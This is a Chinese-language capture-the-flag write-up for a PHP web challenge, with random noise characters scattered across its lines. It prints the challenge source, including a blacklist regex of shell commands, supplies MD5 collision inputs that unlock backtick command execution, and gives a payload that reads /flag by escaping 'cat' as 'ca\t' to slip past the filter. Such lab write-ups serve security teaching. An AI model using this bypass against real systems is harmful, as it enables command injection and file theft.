|
|
o7 v" X! u% H/ T( D0 N<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>0 a; K% x% l; h$ X- o3 \
<p> </p>8 t$ E4 d. ^1 N, a: I- D# r
<p> </p>5 W% D+ l3 R4 w% `: a, M W
<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>: q1 n: ~" h. T2 C/ b6 Q h# e( R( }. c
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
* _5 W) H: T8 U0 U; v<p> </p>5 h0 G1 I# |, R$ R# V
<p> </p>
' n6 W5 ?1 A) y<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>
) x' L6 A3 D% l# [<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>& X/ B e3 h. a6 O0 j9 i1 J, Z+ |# W
<p>首先把那个进行一次base64位解码</p>, ^# g9 ^' ~( @, |3 |- q
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
2 D! l$ b# W; H; ], H! w<p> </p>
4 A' D9 X; B/ g1 j X. h0 w* c<p> </p>
- U# b' i* h% _/ }- o<p> 解码一次以后还是很像base64编码,于是又解码一次</p>6 J; `0 g8 m' s# T7 v
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
4 L4 v# f1 l# q1 I4 g/ @1 m<p> </p>; I8 A, z4 W2 s5 d" {) ^2 v
<p> </p>! d& [! r' c: T0 h' m" P
<p> 然后用hex解码一下得到了</p>
/ o& V5 p! {' d( y" y<div class="cnblogs_Highlighter">
3 v8 X2 O. V* ]& x4 C: y$ \<pre class="brush:sql;gutter:true;">555.png
5 S0 g) c, G6 l# `9 B) _9 v</pre>
1 Q& \( D) F3 y' a3 c* v% d. Z</div>1 f5 U& X, o9 ~
<p> 用同样的方法把index.php进行加密</p>
$ G5 \+ p9 `8 n; J7 Y; y% n9 ^7 T<div class="cnblogs_Highlighter">
3 V8 t, e. `. E; t<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN32 b) m, t# }' |: P! N% H
</pre>
9 v9 ?8 C; `7 l. T8 d2 Y</div>
4 F) j" t) N7 X" F$ @& K0 X<p> 然后输入到地址栏</p>" u# p6 U+ g: q& d+ V
<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>
9 Y2 g3 G1 \6 a L* c<div class="cnblogs_code">! q. x! B8 i" P
<pre><?<span style="color: rgba(0, 0, 0, 1)">php
/ M) Q" v' n: _- r</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
* L* U) u8 `( j! u</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
% X4 S) a' g$ U+ A7 h</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];" p3 A" R! s/ g+ l
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) + X9 j, _4 M0 A% Z1 C
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);/ h% G5 l( I* I' | {
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
) F' e) t) n! A
) a/ v& E) ?- o; X# {</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);" M2 Y3 v: W! Q ?: x
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {! ?7 ?8 F9 p" T
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;
( `; y5 r/ X7 R0 k5 l0 P </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);7 I. W- a* I1 F9 s! \! E, K D
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {+ U- w7 [8 `7 w6 f/ Z
</span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
+ S3 P Z% a* b8 j: j% S+ S </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;1 n o8 _( ?& p4 @% d, J
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;2 d! ?$ Y! {3 _5 q7 L
}
\8 `( d3 I8 p</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
; r4 S6 r4 [6 @4 U</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
; V) p* a+ I5 w5 W& o</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {2 g6 K4 K2 f2 Z8 H8 M* k
</span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);6 r# a3 q' D$ U" w9 g' x/ [3 p
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;, J) l7 [9 B, j/ c( A4 `
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
& _2 l* O2 j6 p9 F* q# J </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
7 f0 _4 w. l* k! G j6 M ^ </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
" J, N; s m# o5 R+ b% v } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {4 e& E9 w0 E3 B3 `9 ]
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
2 `. a I! Q- g }' C* I% g% N8 h2 J6 n1 |
}
3 A/ e8 ?. X; }( j6 L! R2 d7 ?' J! L& D) H
</span>?>
6 @( P7 k, ?0 A6 I/ @<html>! v* L7 P) T& }9 a
<style><span style="color: rgba(0, 0, 0, 1)">( I" w5 h8 n' @& J7 u' j' W8 V9 s
body{1 i* `; m d1 I& x* f
background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;) j- |. G' U+ b* s8 T5 y+ C/ U; e2 a7 ?
background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;& c8 b+ F9 [: F% x
background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;4 Z# C' f9 S+ J( Z
background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
+ s* ^- i9 p0 h# s<span style="color: rgba(0, 0, 0, 1)">}1 R3 G8 s6 d7 f. D: X
</span></style>' x2 q( @ a' _- @1 `/ `
<body># q& E3 y0 U5 }6 n+ V e, G) ?: a
</body>' g$ L. K- [2 }; g- W
</html></pre>" g7 f* [& \) L* s4 S
</div>
" O* j2 `2 J$ t' T9 Z R% g T<p>结合前面的推断,关键代码就在</p>( g, R2 Q8 _; P! i, f) h( ~6 o4 [
<div class="cnblogs_code">
$ z& r1 V6 N a2 i9 y6 X2 S<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
& I n. {% ~# a" `9 ~9 X$ t6 e& q </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;: b2 \% Z4 ^! x4 Q4 h! r* f. e
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {; @4 w% h1 M W+ B1 c: C
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);2 Y% ~3 C4 i" F; C1 z1 y
}</span></pre>/ S/ l% o$ e. h5 s; F0 a1 e
</div>
" K. w( O" Y8 l# P; U<p>这种MD5是md5强碰撞</p>
y! ` T: |; Q4 e<div class="cnblogs_Highlighter">
9 ~% k# p/ y a8 F X<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
% V3 x4 l% L# C s' s</pre>! G$ J% H' M, v3 l$ |
</div> i! K8 m, J6 Z. _" d( y$ t) w
<div class="cnblogs_Highlighter">4 k! B. R% h7 q% v
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a24 F( x! ~$ ?9 j
</pre>
# x5 x4 C. i, k( F7 C# M</div>* c, R% W4 `" j) S X4 W
<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>
5 z1 {, [! k: P. o2 b) q5 D4 g<p>于是采用payload:</p>
* R, M! A j F$ G! G& f3 I: d% d<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>9 i' W1 h, E, W" x4 w+ ?0 y
<p> </p>7 E. p: |# i1 M$ g2 m8 V
<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>4 E9 s, m( p: C/ q5 y( w
<p>ls和l\s在命令执行的时候结果是一样的。</p>
0 d' w. e: S* [<p>然后发现根目录里面有/flag</p>+ {! M d* D. a) p2 o- p
<p>于是payload:</p>
% J5 _ j7 V; j; F& I<div class="cnblogs_Highlighter">
4 e7 t4 B$ ], R6 @<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
/ f2 `# w0 e6 ^. L" |( _% Y</pre>) f6 y! A: I& l
</div>$ J3 A4 J7 C6 p5 I# L
<p> 对于这个题目,因为他没有屏蔽sort和dir</p>
* J+ u3 r* e- s4 r' ]! I5 r<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>% j& o! g/ Z( \0 L3 [3 H7 [
<p> </p>' i' S( G$ H0 ~/ c
|
|
发表于 2022-2-12 14:35:42